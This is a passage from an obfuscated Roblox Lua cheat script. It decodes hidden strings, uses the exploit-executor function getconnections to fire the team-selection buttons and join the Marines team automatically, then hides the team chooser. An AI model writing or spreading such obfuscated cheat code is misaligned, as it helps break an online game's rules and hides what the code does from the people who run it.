pairs({v7("\81\248\60\37\54\134\105\227\61\57\61\245\95\251\32\53\56","\196\28\151\73\86\83"),v7("\222\12\60\3\135\122\13\98\231\12\39\65\166\87\15\120","\22\147\99\73\112\226\56\120"),v7("\153\118\246\252\155\185\97\231\241","\237\216\21\130\149")}) do for v261,v262 in pairs(getconnections(game:GetService(v7("\178\66\94\70\181\219\77","\62\226\46\63\63\208\169")).LocalPlayer.PlayerGui.Main.ChooseTeam.Container.Marines.Frame.ViewportFrame.TextButton[v258])) do v262.Function();end end end end);until join==true  game:GetService(v7("\213\21\84\154\26\31\60","\62\133\121\53\227\127\109\79")).LocalPlayer.PlayerGui.Main.ChooseTeam.Visible=false;break;end end end
